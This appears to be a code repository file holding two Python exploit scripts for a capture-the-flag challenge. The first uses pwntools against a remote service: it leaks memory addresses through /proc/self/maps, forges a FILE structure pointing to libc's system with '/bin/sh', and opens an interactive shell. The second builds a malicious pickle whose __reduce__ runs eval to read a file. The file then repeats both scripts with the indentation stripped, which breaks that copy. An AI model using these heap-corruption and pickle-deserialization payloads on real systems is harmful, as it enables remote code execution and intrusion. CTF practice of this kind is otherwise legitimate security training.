ujin5/labyrinth.py

## labyrinth.py
from pwn import *
def make(name,email,width,height,info,dat):
  s.recvuntil('>')
  s.sendline('1')
  s.recvuntil('NAME>')
  s.sendline(name)
  s.recvuntil('EMAIL>')
  s.sendline(email)
  s.recvuntil('WIDTH>')
  s.sendline(width)
  s.recvuntil('HEIGHT>')
  s.sendline(height)
  s.recvuntil('INFO>')
  s.sendline(info)
  s.send(dat)
def solve(len1,dat1,len2,dat2):
  s.recvuntil('>')
  s.sendline(str(len1))
  s.recvuntil('>')
  s.send(dat1)
  s.recvuntil('>')
  s.sendline(str(len2))
  s.recvuntil('>')
  s.send(dat2)
def leak():
  s.recvuntil('>')
  s.sendline('3')
  s.recvuntil('>')
  s.sendline("/proc/self/maps")
def view():
  s.recvuntil('>')
  s.sendline('3')
  s.recvuntil('>')
  s.sendline("/proc/self/maps")
def key_(key):
  s.recvuntil('>')
  s.sendline('2')
  s.recvuntil('>')
  s.sendline(key)
s = remote('labyrinth.eatpwnnosleep.com', 10000)
leak()
r = s.recvuntil('[stack]')
pie = int(r[0:8],16)
heap = int(r[0x11a:0x11a+8],16)
libc = int(r[0x193:0x193+8],16)
log.info("LIBC : 0x%x"%libc)
log.info("HEAP : 0x%x"%heap)
log.info("PIE : 0x%x"%pie)
make("1","1",str(1),str(2),"1","EE")
s.recvuntil(' SAVE_KEY is ')
key1 = s.recv(64)
dat = "A"*0x40
dat += p32(0xfbad2441) # 0xfbad2400
dat += p32(heap+0x12f1)
dat += p32(heap+0x13ad)+p32(heap+0x8c-0x20)*5+p32(heap+0x23a0-0x94)
dat += ';/bin/sh;'
dat += "\x00"*7
dat += p32(libc+0x3a940) + p32(5) #0x3ada0 0x1b2cc0
dat += p32(0) + p32(heap+0xe8)
dat += '\x00\x00'+p8(0x80)
dat += 'A'*(0x100-len(dat))
make("","",str(0x100),str(0x2),str(0x38)+'\n','1\n'+'A'*(0x100-3)+dat)
s.recvuntil(' SAVE_KEY is ')
key2 = s.recv(64)
key_(key1)
solve(0x10,"1234\n",0x30,"1234\n")
raw_input()
key_(key2)
s.interactive()

## readflag.py
from pickle import dumps
import os
import subprocess
class E(object):
        def __reduce__(self):
                return (eval,("file('test.py').read()", {}))
print dumps(E(),protocol=2)+'#'
	from pwn import *
	def make(name,email,width,height,info,dat):
	s.recvuntil('>')
	s.sendline('1')
	s.recvuntil('NAME>')
	s.sendline(name)
	s.recvuntil('EMAIL>')
	s.sendline(email)
	s.recvuntil('WIDTH>')
	s.sendline(width)
	s.recvuntil('HEIGHT>')
	s.sendline(height)
	s.recvuntil('INFO>')
	s.sendline(info)
	s.send(dat)
	def solve(len1,dat1,len2,dat2):
	s.recvuntil('>')
	s.sendline(str(len1))
	s.recvuntil('>')
	s.send(dat1)
	s.recvuntil('>')
	s.sendline(str(len2))
	s.recvuntil('>')
	s.send(dat2)
	def leak():
	s.recvuntil('>')
	s.sendline('3')
	s.recvuntil('>')
	s.sendline("/proc/self/maps")
	def view():
	s.recvuntil('>')
	s.sendline('3')
	s.recvuntil('>')
	s.sendline("/proc/self/maps")
	def key_(key):
	s.recvuntil('>')
	s.sendline('2')
	s.recvuntil('>')
	s.sendline(key)
	s = remote('labyrinth.eatpwnnosleep.com', 10000)
	leak()
	r = s.recvuntil('[stack]')
	pie = int(r[0:8],16)
	heap = int(r[0x11a:0x11a+8],16)
	libc = int(r[0x193:0x193+8],16)
	log.info("LIBC : 0x%x"%libc)
	log.info("HEAP : 0x%x"%heap)
	log.info("PIE : 0x%x"%pie)
	make("1","1",str(1),str(2),"1","EE")
	s.recvuntil(' SAVE_KEY is ')
	key1 = s.recv(64)
	dat = "A"*0x40
	dat += p32(0xfbad2441) # 0xfbad2400
	dat += p32(heap+0x12f1)
	dat += p32(heap+0x13ad)+p32(heap+0x8c-0x20)*5+p32(heap+0x23a0-0x94)
	dat += ';/bin/sh;'
	dat += "\x00"*7
	dat += p32(libc+0x3a940) + p32(5) #0x3ada0 0x1b2cc0
	dat += p32(0) + p32(heap+0xe8)
	dat += '\x00\x00'+p8(0x80)
	dat += 'A'*(0x100-len(dat))
	make("","",str(0x100),str(0x2),str(0x38)+'\n','1\n'+'A'*(0x100-3)+dat)
	s.recvuntil(' SAVE_KEY is ')
	key2 = s.recv(64)
	key_(key1)
	solve(0x10,"1234\n",0x30,"1234\n")
	raw_input()
	key_(key2)
	s.interactive()
	from pickle import dumps
	import os
	import subprocess
	class E(object):
	def __reduce__(self):
	return (eval,("file('test.py').read()", {}))
	print dumps(E(),protocol=2)+'#'